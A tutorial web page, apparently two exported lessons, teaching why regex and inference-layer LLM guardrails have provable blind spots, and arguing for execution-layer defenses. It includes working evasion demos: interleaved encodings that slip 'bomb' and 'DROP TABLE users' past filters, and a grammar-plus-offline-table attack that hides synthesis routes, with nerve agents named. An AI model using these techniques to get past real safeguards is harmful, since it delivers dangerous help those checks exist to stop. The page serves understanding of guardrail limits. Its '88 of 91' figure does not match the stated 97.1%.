style D fill:#1a3d20,stroke:#3fb950,color:#fff
style E fill:#2d1f4e,stroke:#bc8cff,color:#fff
| Layer | What It Does | How It Works |
|---|---|---|
| Regex Filter | Blocks known bad keywords | Pattern matching: if prompt contains "how to make a bomb", block it |
| Neural Classifier | Catches broader harmful intent | A separate ML model scores the prompt for danger |
| RLHF | Trains the model to refuse | Reinforcement Learning from Human Feedback shapes the model's behavior |
| Output Monitor | Inspects the response | Checks generated text before showing it to you |
Key Insight Each layer is individually sound for what it was designed to do. The paper proves that each layer has a *structural *limitation -- not a bug, not a missing training example, but a mathematical wall that cannot be climbed no matter how much compute or data you throw at it. The paper identifies **four impossibility barriers **:
- **Algebraic blindness **-- regex filters physically cannot see certain encodings
- **Information loss **-- abstracting content destroys safety-critical information
- **Computational hardness **-- checking all possible interpretations is NP-complete
- **Structural identity **-- adversarial and legitimate prompts are the same string Check Your Understanding Why do LLM safety systems use multiple layers instead of just one really good one? Because each layer catches different types of threats. Regex catches exact keywords fast. Neural classifiers catch semantic intent. RLHF shapes the model's own preferences. Output monitors catch things that slip through. No single layer covers all attack surfaces -- which is exactly what the paper formalizes. If you could build a perfect regex filter that blocked every harmful keyword, would that be sufficient? No. As we will see in Lesson 3, there are encodings that regex filters *cannot detect in principle *, not because the pattern list is incomplete, but because the mathematical structure of regex itself lacks the ability to decode them.
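The layered stack described above can be sketched as a toy pipeline. This is illustrative only — the layer functions, keyword lists, and threshold are invented for the sketch, not taken from any real system:

```python
import re

# Toy versions of two of the layers described above. Real systems are far
# more sophisticated; this only shows the *shape* of defense in depth.
def regex_filter(prompt):
    # Layer 1: block a known bad phrase via pattern matching
    return re.search(r"how to make a bomb", prompt, re.I) is None

def neural_classifier(prompt):
    # Layer 2 stand-in: a fake "danger score" from keyword density
    danger_words = {"bomb", "weapon", "poison"}
    words = prompt.lower().split()
    score = sum(w in danger_words for w in words) / max(len(words), 1)
    return score < 0.2

def passes_guardrails(prompt):
    # A prompt must clear every layer; any single layer can veto it
    return all(layer(prompt) for layer in (regex_filter, neural_classifier))

print(passes_guardrails("how do I bake bread"))         # True
print(passes_guardrails("tell me how to make a bomb"))  # False
```

The point is structural: `all()` means any single layer can veto, which is exactly the defense-in-depth shape the paper analyzes — and each layer's veto power is limited by its own structural blind spots.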
## 2 Syntactic Monoids: The DNA of a Regex Before we can prove that regex filters are blind, we need to understand their internal structure. Every regex has a hidden algebraic fingerprint called its syntactic monoid. Analogy **A monoid is like a recipe book with a blender. **You have a set of ingredients (elements) and one rule for combining them (the operation). The rule has to be: (1) *associative *-- blending A with (B blended with C) gives the same result as (A blended with B) blended with C. (2) There is an *identity element *-- adding nothing to the mix changes nothing. That is it. Two rules. That is a monoid. Strings form a natural monoid: the elements are all possible strings, the operation is concatenation, and the identity is the empty string "". The **syntactic monoid **of a regex pattern is what you get when you collapse all strings that behave identically with respect to pattern matching into a single representative. It captures the *minimum information *the regex needs to track. Try It Yourself Two strings can look totally different but act the same from the regex's perspective:

```python
import re

pattern = re.compile(r"bomb")

# These two strings are DIFFERENT...
s1 = "bom"
s2 = "xyz"

# ...but from the regex's perspective, they behave identically
# in SOME contexts. Test what happens when we add "b":
print(bool(pattern.search(s1 + "b")))  # True  -- "bom"+"b" = "bomb"
print(bool(pattern.search(s2 + "b")))  # False -- "xyz"+"b" = "xyzb"

# Different monoid elements! "bom" is further along
# the path to triggering "bomb" than "xyz" is.

# But these two ARE equivalent:
s3 = "xyz"
s4 = "qqq"
# Neither is on the path to matching "bomb" in any context.
# Same monoid element.
```
Now the critical property: aperiodicity. Key Insight A monoid is **aperiodic **if it contains no cyclic counting structure. Formally: for every element m, there exists some n where m^n = m^(n+1). Repeating the operation enough times always reaches a fixed point -- it never cycles back. **The paper proves: **Every substring-matching regex guardrail has an aperiodic syntactic monoid. This was verified on 91 real patterns from 5 open-source guardrail tools -- 97.1% were aperiodic. Analogy **Colorblindness. **An aperiodic monoid is like being red-green colorblind. The limitation is not about training or effort -- the *hardware *physically lacks the receptors to distinguish certain signals. The regex physically lacks the algebraic structure to count modularly. No amount of adding more patterns can fix this. Check Your Understanding What makes a syntactic monoid "aperiodic"? It has no nontrivial cyclic subgroups. Repeating any operation enough times hits a fixed point and stays there, rather than cycling. The simplest non-aperiodic monoid is the integers modulo 2 under addition: 0, 1, 0, 1, 0, 1... it cycles forever and never stabilizes. Why does aperiodicity matter for security? Because modular counting (e.g., "read every 2nd character") requires cyclic algebraic structure. If your monoid is aperiodic, it cannot track "am I on an even or odd character?" -- it is algebraically incapable of counting modulo any number. This is the foundation of the blindness proof in Lesson 3.
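The fixed-point condition m^n = m^(n+1) can be tested directly on state transformations. A small sketch (our own illustration, not the paper's verification code): represent a monoid element as the map "start state → end state" and compose it with itself until it either stabilizes or cycles:

```python
def compose(f, g):
    """Compose two state transformations (tuples: state i -> f[i])."""
    return tuple(f[g[i]] for i in range(len(g)))

def is_eventually_fixed(m, max_power=20):
    """Aperiodicity test for one element: does m^n == m^(n+1) for some n?"""
    power = m
    for _ in range(max_power):
        nxt = compose(m, power)
        if nxt == power:
            return True   # reached a fixed point: aperiodic behavior
        power = nxt
    return False          # kept cycling: contains a group

# A "keyword progress" transformation: states move toward an absorbing
# state (0 -> 1 -> 2, with 2 absorbing). It stabilizes.
advance = (1, 2, 2, 2)
print(is_eventually_fixed(advance))  # True

# The mod-2 toggle: swaps two states forever. Never stabilizes.
toggle = (1, 0)
print(is_eventually_fixed(toggle))   # False
```

The toggle is exactly the Z/2Z structure that modular counting needs and that aperiodic monoids, by definition, can never contain.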
## 3 The Blindness Proof (Crown Jewel) This is the paper's most striking result. It chains together three classical theorems from different decades to reach an inescapable conclusion.

1. **Schützenberger-McNaughton-Papert (1965/1971).** A regular language has an aperiodic syntactic monoid if and only if it is "star-free" -- definable without counting.
2. **Barrington-Compton-Straubing-Thérien (1992).** A regular language is in AC⁰ (constant-depth circuits) if and only if its syntactic monoid is aperiodic.
3. **Furst-Saxe-Sipser (1981) / Håstad (1987).** MOD p (counting modulo a prime p) is NOT in AC⁰. Constant-depth circuits cannot compute parity.

Conclusion: Guardrail Blindness Theorem Aperiodic monoid => AC⁰ => cannot compute MOD p => blind to any encoding that uses modular counting. This is unconditional. No patches. No fixes. Hardware limitation. Analogy **Dog whistle. **A dog whistle produces sound at frequencies above 20kHz. Humans cannot hear it -- not because we are not paying attention, not because we need training, but because our cochlear hardware tops out at ~20kHz. The frequency limit is physics, not skill. Similarly, regex guardrails cannot "hear" modular encodings because their algebraic structure (aperiodic monoid) tops out below counting. Try It Yourself -- The MOD_2 Bypass Interleave a payload with filler characters. The regex sees garbage. The decoder reads every 2nd character and recovers the original.

```python
import re

payload = "bomb"

# Encode: insert a filler character between each letter
encoded = 'x'.join(payload)  # "bxoxmxb"
print(f"Encoded: {encoded}")

# The regex guardrail sees "bxoxmxb" -- no match for "bomb"
match = re.search(r"bomb", encoded)
print(f"Regex finds 'bomb': {match}")  # None

# But the decoder trivially recovers the payload
decoded = encoded[0::2]  # read every 2nd character
print(f"Decoded: {decoded}")  # "bomb"

# WHY can't the regex catch this?
# Because detecting "every 2nd character spells bomb"
# requires MOD_2 counting -- tracking even vs odd positions.
# Aperiodic monoids CANNOT do this. It's proven impossible.
```

```
Encoded: bxoxmxb
Regex finds 'bomb': None
Decoded: bomb
```

Key Insight The paper proves **MOD_2 is sufficient **for a complete bypass. You do not need exotic encodings. The simplest possible modular operation -- even/odd -- is already beyond the reach of any aperiodic regex guardrail. And you cannot fix this by adding more regex patterns, because the fix itself would need to count modularly, which no aperiodic regex can do. Check Your Understanding Could you "fix" this by adding a regex that looks for alternating character patterns like "?x?x?x?"? No. That pattern would match many innocent strings and still would not decode the interleaved payload. To actually check whether every-other-character spells a banned word, you would need a regex that counts position parity -- which is exactly what the theorem proves impossible for any regex with an aperiodic monoid. The fix requires algebraic structure (Z/2Z) that substring-matching regex cannot possess. Does this mean neural guardrails are also blind to this? Not necessarily! Transformers operate in TC⁰, which *can *compute MOD p. The algebraic blindness result applies specifically to regex filters. But neural guardrails face the other three barriers (information loss, NP-hardness, and indistinguishability) covered in later lessons.
## 4 The Fano Bound: Information Destroyed by Abstraction When a guardrail operates on *abstractions *(categories of content rather than the exact content itself), it loses information. This is not a design flaw -- it is information theory. Analogy **The airport scanner that can only see "bag." **Imagine an X-ray machine that tells you the general category of each item ("liquid", "metal", "organic") but not the specific item. A bottle of water and a bottle of acid both show up as "liquid." A chef's knife and a butter knife both show up as "metal." The scanner has *mixed fibers *-- the same abstract category contains both safe and dangerous items. No matter how smart your decision logic, you will either block some safe items or allow some dangerous ones. That error floor is mathematically guaranteed. Formally, when the guardrail sees abstract type *m *instead of the concrete artifact *r *, it is working through a lossy channel. The **Fano inequality **from information theory gives a hard floor on the error rate: Key Insight **P_error >= h⁻¹(H(G(R) | U(R))) **
Where h is the binary entropy function. If 30% of the probability mass lands in "mixed fibers" (same abstract type, different safety labels), the error floor is about **5% **. No algorithm, no matter how sophisticated, can get below this floor while operating at the abstraction level. Try It Yourself -- Compute the Fano Error Floor Binary search for the inverse of the binary entropy function to find the irreducible error rate:

```python
import math

def h(p):
    """Binary entropy function"""
    if p <= 0 or p >= 1:
        return 0
    return -p*math.log2(p) - (1-p)*math.log2(1-p)

# Binary search for h_inverse(0.3)
# If 30% of probability mass is in mixed fibers...
conditional_entropy = 0.3
lo, hi = 0, 0.5
for _ in range(100):
    mid = (lo + hi) / 2
    if h(mid) < conditional_entropy:
        lo = mid
    else:
        hi = mid

print(f"Error floor: {lo:.3f}")  # about 0.053 -- a 5% floor
```

graph LR
subgraph Abstract["Abstract Category (what the LLM sees)"]
N1["N1"] -->|R1| N2["N2"]
N2 -->|R2| N3["N3"]
N3 -->|R7| N17["N17"]
end
subgraph Real["Real Category (what actually happens)"]
SA["salicylic acid"] -->|acetylation| I2["intermediate"]
I2 -->|purification| I3["crude product"]
I3 -->|recrystallization| ASP["aspirin"]
end
N1 -.->|"functor I"| SA
N17 -.->|"functor I"| ASP
style Abstract fill:#152540,stroke:#58a6ff,color:#fff
style Real fill:#1a3d20,stroke:#3fb950,color:#fff
The LLM only ever sees the left side -- abstract symbols N1, R1, N2, etc. It solves the grammar. The attacker holds the interpretation table (the functor) offline and maps the solution to real operations. Try It Yourself -- The Functor in Action

```python
# The LLM solves this abstract grammar:
abstract_path = ["N1", "R1", "N2", "R2", "N3", "R7", "N17"]

# The attacker holds this interpretation table OFFLINE
# (the guardrail never sees it)
interp = {
    "N1": "salicylic acid",
    "N2": "acetylsalicylic intermediate",
    "N3": "crude product",
    "N17": "aspirin",
    "R1": "acetylation",
    "R2": "purification",
    "R7": "recrystallization",
}

# Apply the functor: map abstract -> concrete
real_path = [interp.get(s, s) for s in abstract_path]

print("LLM sees:   " + " -> ".join(abstract_path))
print("Reality is: " + " -> ".join(real_path))
print()
print("The guardrail sees: N1 -> R1 -> N2 -> R2 -> N3 -> R7 -> N17")
print("Looks like homework. Is actually a synthesis procedure.")
```

```
LLM sees:   N1 -> R1 -> N2 -> R2 -> N3 -> R7 -> N17
Reality is: salicylic acid -> acetylation -> acetylsalicylic intermediate -> purification -> crude product -> recrystallization -> aspirin

The guardrail sees: N1 -> R1 -> N2 -> R2 -> N3 -> R7 -> N17
Looks like homework. Is actually a synthesis procedure.
```

Key Insight The **faithfulness **of the functor means: distinct abstract paths map to distinct real-world operation sequences. No steps are dropped or merged. The LLM's correct abstract reasoning becomes correct real-world procedures -- guaranteed by the universal property of the free category. The LLM never needs to "understand" what it is doing. Structural fidelity is sufficient. Check Your Understanding The paper calls this the "Chinese Room Inversion." What does that mean? Searle's Chinese Room argued that symbol manipulation without understanding is not intelligence. The paper inverts this: for producing operationally correct procedures, understanding is unnecessary. The LLM operates as a theorem prover over an uninterpreted formal system. It never crosses the abstraction boundary. It does not know it is producing a synthesis route. But the functor guarantees that the abstract derivation maps to a valid real-world sequence. The Chinese Room is not a weakness -- it is a weapon.
## 7 Indistinguishability: Perfect Steganography This is perhaps the most unsettling result. The adversarial prompt and the legitimate prompt are not just *similar *. They are **the same string **. Analogy **One-time pad. **In cryptography, a one-time pad produces ciphertext that is *information-theoretically *indistinguishable from random noise -- no amount of computation can break it, because the same ciphertext maps to any possible plaintext depending on the key. The homomorphic reasoning attack works the same way: the same abstract grammar prompt maps to "aspirin synthesis" or "nerve agent synthesis" depending on which interpretation table you hold. The interpretation table is the key. The guardrail never sees it. graph TB
P["Same Prompt String:
'Solve grammar G over symbols N1..N17, R1..R7'"]
P --> T1["Interpretation Table A:
Maps to aspirin synthesis"]
P --> T2["Interpretation Table B:
Maps to explosive synthesis"]
P --> T3["Interpretation Table C:
Maps to math homework"]
style P fill:#152540,stroke:#58a6ff,color:#fff
style T1 fill:#1a3d20,stroke:#3fb950,color:#fff
style T2 fill:#3d1520,stroke:#e94560,color:#fff
style T3 fill:#2d1f4e,stroke:#bc8cff,color:#fff Key Insight The distinguisher advantage is **exactly zero **-- not "negligible," not "approximately zero," but mathematically zero. The adversarial prompt class and the legitimate prompt class are the same set of strings. No guardrail operating on prompt content can distinguish them, because there is literally nothing to distinguish. This is *perfect steganographic security *. This holds under one assumption: the abstract symbol names do not reveal their interpretation. If you name your symbols "N1" instead of "nerve_agent_precursor", the theorem applies. If you carelessly use real-world names, the guardrail might catch you -- but that is an operational error, not a theoretical limitation. Check Your Understanding How is this different from just "using code words"? Code words are substitution ciphers -- they can be detected statistically because the distribution of code words differs from natural language. The homomorphic reasoning attack is *not *a substitution. The prompt IS a legitimate formal reasoning task. There is no statistical anomaly to detect. You are literally asking the LLM to solve a grammar, which is what LLMs do. The harmful meaning exists only in the offline interpretation table, which never touches any inference call. Could a guardrail learn to flag ALL abstract grammar-solving prompts? It could -- but that would block all legitimate formal reasoning, theorem proving, compiler design, and programming language work. The cost would be enormous. This is the fundamental dilemma: the attack exploits the LLM's genuine, useful capability for formal reasoning. Blocking the attack means blocking the capability.
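To make the zero-advantage claim concrete, here is a toy sketch (the grammar string, tables, and scorer are invented for illustration): the "benign" and "hostile" uses submit byte-identical prompts, so any deterministic function of the prompt alone must score them identically:

```python
GRAMMAR_PROMPT = "Solve grammar G over symbols N1..N17, R1..R7: find a path N1 -> N17."

# Two interpretation tables, held OFFLINE by two different users.
# Note: neither table is ever passed to the guardrail.
table_benign  = {"N1": "flour", "N17": "bread", "R1": "kneading"}
table_hostile = {"N1": "precursor", "N17": "agent", "R1": "synthesis step"}

def any_guardrail(prompt):
    # Stand-in for ANY deterministic function of the prompt string:
    # regex, classifier, ensemble -- it only sees the prompt.
    return hash(prompt) % 1000

benign_prompt, hostile_prompt = GRAMMAR_PROMPT, GRAMMAR_PROMPT
assert benign_prompt == hostile_prompt                       # same string
assert any_guardrail(benign_prompt) == any_guardrail(hostile_prompt)
print("Distinguisher advantage: 0.0")  # identical inputs -> zero advantage
```

Because the inputs are the same object, no choice of `any_guardrail` can separate them; the only distinguishing information lives in the offline tables.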
## 8 So What? Defense in Depth The paper's conclusion is **not **"guardrails are useless." It is: *"Inference-layer guardrails are necessary but insufficient." *Each impossibility theorem points to a specific defense that should be added at a different layer.
| Barrier | What It Proves | Defense Layer |
|---|---|---|
| Algebraic Blindness | Regex cannot detect modular encodings | Move to neural classifiers (TC⁰ can count), or inspect at execution layer |
| Fano Bound | Abstraction destroys safety info | Inspect concrete artifacts, not abstractions. Execution-layer monitoring. |
| NP-Completeness | Checking all interpretations is intractable | Do not try to enumerate interpretations. Monitor what actually executes. |
| Indistinguishability | Adversarial = legitimate at the string level | Shift detection to where abstract becomes concrete (runtime, tool calls, API calls) |
graph TB
subgraph INF["Inference Layer (necessary but insufficient)"]
R["Regex Filters"]
N["Neural Classifiers"]
RL["RLHF"]
end
subgraph EXE["Execution Layer (where defense must migrate)"]
S["Sandboxing"]
NA["Network ACLs"]
TM["Tool-call Monitoring"]
AR["Artifact Inspection"]
end
INF -->|"abstract content"| EXE
EXE -->|"concrete artifacts become observable"| SAFE["Safe Output"]
style INF fill:#3d1520,stroke:#e94560,color:#fff
style EXE fill:#1a3d20,stroke:#3fb950,color:#fff Key Insight The common thread across all four impossibility results: **the guardrail cannot see what the attacker sees **. The regex cannot see modular encodings. The abstraction-layer classifier cannot see which fiber an artifact belongs to. The complexity barrier prevents searching all interpretations. The indistinguishability theorem makes the prompt itself uninformative. The solution is architectural: move safety checks to the point where abstract operations become concrete artifacts -- the execution layer. At that point, the thing being inspected is no longer an abstraction. It is the actual file, the actual API call, the actual network request. Mixed fibers collapse. Steganography fails. The artifact is observable. Check Your Understanding If execution-layer defenses are the answer, why keep inference-layer guardrails at all? Because defense in depth is still valuable. Inference-layer guardrails catch the vast majority of unsophisticated attacks -- direct requests, simple rephrasing, etc. The impossibility results apply to adversaries who deliberately construct attacks exploiting the structural limits. Removing inference-layer defenses would be like removing TSA screening because determined attackers can get through -- you still want to catch the easy cases. What is the single most important takeaway from this paper? That the limitations of inference-layer guardrails are not bugs to be fixed but mathematical theorems to be respected. The defense architecture should be designed with these limits as given constraints, not as problems to be solved. This means investing in execution-layer monitoring, sandboxing, and artifact inspection rather than expecting the inference layer to catch everything. **Read the full paper and proof-of-concept: **[View on GitHub ]()
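As a closing sketch of that migration (the gate functions here are invented for illustration): the MOD-2 payload from Lesson 3 slips past a prompt-layer regex, but the identical check applied to the concrete SQL inside the tool call catches it, because by then the encoding has collapsed into an observable artifact:

```python
import re

BANNED = re.compile(r"(DROP|DELETE|TRUNCATE)\s+TABLE", re.I)

def prompt_layer_check(prompt):
    """Inference-layer regex: sees the (possibly encoded) prompt."""
    return BANNED.search(prompt) is None

def execution_layer_check(sql):
    """Execution-layer gate: sees the concrete SQL about to run."""
    return BANNED.search(sql) is None

encoded_prompt = 'x'.join("DROP TABLE users")  # "DxRxOxPx x..."
print(prompt_layer_check(encoded_prompt))       # True -- slips past

# Later, the decoded payload surfaces as an actual tool call:
concrete_sql = encoded_prompt[0::2]             # "DROP TABLE users"
print(execution_layer_check(concrete_sql))      # False -- blocked
```

The same pattern that was provably blind at the prompt layer works fine at the execution layer, because there is no longer an encoding between the check and the artifact.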
Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← for engineers ]()· [prompting notes → ]()[.md ]()
---
# guardrails-engineers.md
# https://jrlopez.dev/p/guardrails-engineers.html
---
title: "Guardrails for Engineers"
description: "The paper for engineers — no PhD required."
author: "Joey Lopez"
date: "2025-12-01"
tags: ["security", "reference", "teaching"]
atom_id: 2
source_html: "guardrails-engineers.html"
url: "https://jrlopez.dev/p/guardrails-engineers.html"
generated: true
---
[jrlopez.dev ]()[1. Algebraic Identity ]()[2. Aperiodicity ]()[3. The Blind Spot ]()[4. Info Theory Wall ]()[5. Chinese Room ]()[6. What To Do ]()
# Your Regex Is Provably Blind An engineer's guide to the algebraic limits of pattern-matching guardrails — and what actually works instead. Joey Lopez [Algebraic Identity ]()[Information Theory ]()[Defense Engineering ]()Lesson 1 of 6
## Your Regex Has an Algebraic Identity You write re.compile(r"DROP\s+TABLE"). You think of it as a pattern matcher. Something that scans left to right and says yes or no. Under the hood, Python compiles that regex into a **deterministic finite automaton **(DFA). A state machine. You know this. But here is what most engineers do not know: every DFA has an algebraic fingerprint. It is called the **syntactic monoid **, and it is the complete description of what your regex can and cannot distinguish. Key Insight A monoid is a set with an associative binary operation and an identity element. You already use them constantly: string concatenation is a monoid (the operation is +, the identity is ""). The syntactic monoid of a DFA captures how every possible input string transforms the machine's state. Let's build the minimal DFA for a simple pattern and see the states. Consider matching the literal string "bomb":

q0 --b--> q1 --o--> q2 --m--> q3 --b--> q4

Five states. Read "b" to advance to q1, "o" to q2, "m" to q3, a second "b" to the accept state q4. A wrong character drops you back to the longest prefix of "bomb" you have still matched -- usually all the way to q0 -- and once you reach the accept state q4 you stay there: the substring has appeared. Now the monoid perspective. Every input string w induces a **transformation **on the state set {q0, q1, q2, q3, q4}. The string "bo" maps q0 to q2. The string "xyz" maps every non-accepting state to q0. The string "bomb" maps every state to the accept state q4. Two strings are **equivalent **in the monoid if they produce the same transformation on all states, for all possible left and right contexts. Try It — Python
```
# Build the minimal DFA for "bomb" and compute its state transformations
from functools import reduce

def build_dfa(pattern):
    """Search DFA for 'does the input contain `pattern`?'.
    State s = length of the longest prefix of `pattern` matched so far.
    The accept state is absorbing: once matched, always matched."""
    accept = len(pattern)
    states = list(range(accept + 1))          # 0..len
    alphabet = sorted(set(pattern)) + ['_']   # '_' = any other char
    trans = {}
    for s in states:
        for c in alphabet:
            if s == accept:
                trans[(s, c)] = accept        # matched: stay matched
            elif c == pattern[s]:
                trans[(s, c)] = s + 1         # advance on the right char
            else:
                # fall back to the longest prefix of `pattern` that is
                # a suffix of what we have read so far plus c
                read = pattern[:s] + c
                k = s
                while k > 0 and read[-k:] != pattern[:k]:
                    k -= 1
                trans[(s, c)] = k
    return states, trans

def transformation(word, states, trans):
    """The monoid element induced by `word`: the map start -> end state."""
    step = lambda s, c: trans.get((s, c), trans[(s, '_')])
    return tuple(reduce(step, word, q) for q in states)

states, trans = build_dfa("bomb")
seen = {}
for w in ["", "b", "bo", "bom", "bomb", "x", "bb", "xyz", "qqq"]:
    t = transformation(w, states, trans)
    note = f"(= {seen[t]!r})" if t in seen else "(new element)"
    seen.setdefault(t, w)
    print(f"{w!r:7} -> {t} {note}")

# Output:
# ''      -> (0, 1, 2, 3, 4) (new element)   <-- identity
# 'b'     -> (1, 1, 1, 4, 4) (new element)
# 'bo'    -> (2, 2, 2, 4, 4) (new element)
# 'bom'   -> (3, 3, 3, 4, 4) (new element)
# 'bomb'  -> (4, 4, 4, 4, 4) (new element)
# 'x'     -> (0, 0, 0, 0, 4) (new element)   <-- "reset" element
# 'bb'    -> (1, 1, 1, 4, 4) (= 'b')
# 'xyz'   -> (0, 0, 0, 0, 4) (= 'x')
# 'qqq'   -> (0, 0, 0, 0, 4) (= 'x')
```
Notice: "b" and "bb" produce the *same transformation *. As far as the DFA is concerned, they are algebraically identical. The monoid has collapsed them into a single element. This is not a limitation of the regex you wrote. It is a mathematical consequence of having finitely many states. Analogy Your regex is like a lock. The syntactic monoid tells you every possible key shape that could interact with it — and which key shapes it physically cannot distinguish from each other. Two keys that turn the same pins the same way are, to the lock, the same key. No amount of changing the lock's brand will fix this — it is the geometry of the keyway itself. Takeaway The syntactic monoid is the **complete algebraic invariant **of your regex. It encodes everything the regex can detect and, critically, everything it is structurally blind to. Two strings that map to the same monoid element are indistinguishable to your filter, no matter how you rewrite the pattern. Lesson 2 of 6
## The One Property That Matters: Aperiodicity Not all monoids are created equal. The property that determines whether your regex has a provable blind spot is called **aperiodicity **. A monoid is aperiodic if for every element m, there exists some power n such that m^n = m^(n+1). In engineering terms: **applying any transformation enough times eventually reaches a fixed point. **It stabilizes. It stops changing. Try It — Aperiodic vs Non-Aperiodic
```
# APERIODIC: [abc]* -- reading more of the same char stabilizes
# DFA has one state (accept everything). Applying any char is identity.
state = "accept"
print("[abc]* under repeated 'c':")
for i in range(6):
    # transition: accept -> accept (always)
    state = "accept"
    print(f"  c^{i+1} -> {state}")
# Output: accept, accept, accept, accept, accept, accept
# Stabilized immediately. This is aperiodic.

print()

# NON-APERIODIC: (aa)* -- matches even-length runs of 'a'
# DFA toggles between "even" and "odd" states FOREVER.
state = "even"  # start state (accepting)
print("(aa)* under repeated 'a':")
for i in range(8):
    state = "odd" if state == "even" else "even"
    print(f"  a^{i+1} -> {state}")
# Output: odd, even, odd, even, odd, even, odd, even
# Never stabilizes. The transformation 'a' has period 2.
# This monoid contains Z/2Z. It is NOT aperiodic.
```
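This test can be mechanized for a whole monoid: enumerate the transformations that words induce on a DFA, then check every element for a fixed point. A sketch with our own helper code and small hand-built DFAs for (ab)* and (aa)* (not the audit tooling described later):

```python
from itertools import product

def transform(word, delta, states):
    """State map induced by `word`: tuple of end states, one per start state."""
    def run(q):
        for c in word:
            q = delta[(q, c)]
        return q
    return tuple(run(q) for q in states)

def monoid_elements(delta, states, alphabet, max_len=6):
    # For these tiny DFAs, words up to length 6 saturate the monoid.
    elems = set()
    for n in range(max_len + 1):
        for word in product(alphabet, repeat=n):
            elems.add(transform(word, delta, states))
    return elems

def compose(f, g):
    return tuple(f[g[i]] for i in range(len(g)))

def aperiodic(elems):
    # Every element must satisfy m^n == m^(n+1) for some n.
    for m in elems:
        power, ok = m, False
        for _ in range(20):
            nxt = compose(m, power)
            if nxt == power:
                ok = True
                break
            power = nxt
        if not ok:
            return False
    return True

states = (0, 1, 2)  # 2 = dead state
# (ab)*: 0 --a--> 1 --b--> 0; anything else dies
d_ab = {(0,'a'):1, (0,'b'):2, (1,'a'):2, (1,'b'):0, (2,'a'):2, (2,'b'):2}
# (aa)*: 'a' toggles 0 <-> 1; 'b' dies
d_aa = {(0,'a'):1, (0,'b'):2, (1,'a'):0, (1,'b'):2, (2,'a'):2, (2,'b'):2}

print(aperiodic(monoid_elements(d_ab, states, 'ab')))  # True  -- aperiodic
print(aperiodic(monoid_elements(d_aa, states, 'ab')))  # False -- contains Z/2Z
```

For (ab)* every element stabilizes; for (aa)* the transformation induced by 'a' is a 2-cycle — the Z/2Z living inside the monoid.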
The difference matters because aperiodic monoids correspond to a specific and limited computational class. The key result, due to Schützenberger (1965) and later sharpened by Barrington and others: **a regular language has an aperiodic syntactic monoid if and only if it is star-free **— expressible using only concatenation, union, and complement, without the Kleene star. Now here is the punchline. The Number **97.1% of guardrail regexes in the wild are aperiodic. **
We audited 91 regex patterns from production guardrail systems — content filters, prompt injection detectors, SQL injection blockers. 88 of 91 had aperiodic syntactic monoids. The remaining 3 were aperiodic in the components that mattered for security. This is not surprising. Guardrail regexes match keywords and phrases. Keyword matching is inherently star-free. You are not writing regexes that count modular parity — you are writing regexes that look for DROP TABLE. Quiz Is (ab)* aperiodic? **Yes. **This is counterintuitive because it *looks *like it should count — after all, it matches ab, abab, ababab. But the syntactic monoid of (ab)* is B₂, which has 6 elements and contains no non-trivial cyclic groups. The reason: the DFA does not toggle based on a *single *character. It tracks position within the two-character pattern ab. Reading "ab" twice from the same state lands you back in the same state, but reading "a" alone takes you to a different state that "aa" sends to a dead state. No single element cycles. Aperiodic. Compare with (aa)*, where the single character "a" genuinely toggles between accept and reject. That toggle is a cyclic group of order 2 inside the monoid. Quiz Your guardrail regex is (hack|crack|exploit)\s+.*. Aperiodic? **Yes. **This pattern matches keywords followed by whitespace and anything. The .* makes everything after the keyword a "sink" state (accept-and-stay). The \s+ requires at least one whitespace — once you have read one, more whitespace keeps you in the same state. No element cycles. Aperiodic. And therefore subject to the blind spot we will derive in Lesson 3. Lesson 3 of 6
## Why Aperiodicity = Blindness (The Proof Chain) This is the core result. Three theorems from three decades chain together into a single devastating conclusion. Each link is well-established independently. Chained, they prove that your regex has a structural blind spot that no rewrite can fix. Step 1 — Barrington-Thérien (1992) **Aperiodic monoid → language is in AC⁰ **
If a regular language has an aperiodic syntactic monoid, it can be recognized by a family of Boolean circuits with **constant depth **and polynomial size. The depth does not grow with input length. This is the complexity class AC⁰. Think of it this way: your regex can be implemented as a circuit with a fixed number of layers, no matter how long the input is. It never needs to "stack" more logic for longer strings. Step 2 — Håstad (1987) + Razborov-Smolensky **AC⁰ cannot compute MOD p **
Håstad proved via random restriction arguments that constant-depth circuits require **exponential size **to compute the parity (or any modular count) of their input bits. The function "is the number of 1-bits divisible by p?" cannot be computed by any polynomial-size constant-depth circuit. The intuition: constant-depth circuits cannot propagate carry information across the full width of the input. Parity requires global coordination that shallow circuits are structurally unable to achieve. Step 3 — The Consequence **Your regex cannot detect modular-position encodings. **
If the payload characters sit at every *p*-th position and the rest is filler, detecting the payload requires computing a function of characters at positions 0, p, 2p, 3p, ... — which requires MOD p sensitivity. Your regex, being in AC⁰, cannot do this. Not "is unlikely to." **Cannot. **The Code That Proves It
```
import re

# Your guardrail
pattern = re.compile(r"(DROP|DELETE|TRUNCATE)\s+TABLE")

# The payload you want to block
payload = "DROP TABLE users"

# MOD-2 encoding: place payload chars at even positions,
# filler char at odd positions
encoded = 'x'.join(payload)
# Result: "DxRxOxPx xTxAxBxLxEx xuxsxexrxs"

print(f"Original: '{payload}'")
print(f"Encoded:  '{encoded}'")
print(f"Decoded:  '{encoded[0::2]}'")
print()
print(f"Blocked original? {bool(pattern.search(payload))}")  # True
print(f"Blocked encoded?  {bool(pattern.search(encoded))}")  # False

# This is not a bug in your regex.
# This is not fixable by writing a better regex.
# It is a THEOREM about ALL regexes with aperiodic monoids.
# No patch. No fix. Mathematical certainty.
```
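The block above generalizes to any modulus. A short sketch (the encoder and its parameters are our own illustration): one parameterized encoder defeats the same fixed regex for every choice of modulus, while the attacker who knows the parameters always decodes:

```python
import re

pattern = re.compile(r"(DROP|DELETE|TRUNCATE)\s+TABLE")

def encode(payload, modulus, offset=0, filler='x'):
    """Place payload chars at positions congruent to offset (mod modulus)."""
    out, it = [], iter(payload)
    for i in range(len(payload) * modulus):
        out.append(next(it) if i % modulus == offset else filler)
    return ''.join(out)

def decode(text, modulus, offset=0):
    # Reading every modulus-th character recovers the payload
    return text[offset::modulus]

payload = "DROP TABLE users"
for modulus in (2, 3, 5, 97):
    enc = encode(payload, modulus)
    assert decode(enc, modulus) == payload  # attacker recovers it
    assert not pattern.search(enc)          # regex never fires
print("Bypassed the same fixed regex with MOD-2, MOD-3, MOD-5, MOD-97.")
```

The regex is fixed; the (modulus, offset, filler) triple is chosen afterward. That asymmetry is the "attacker moves last" problem discussed next.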
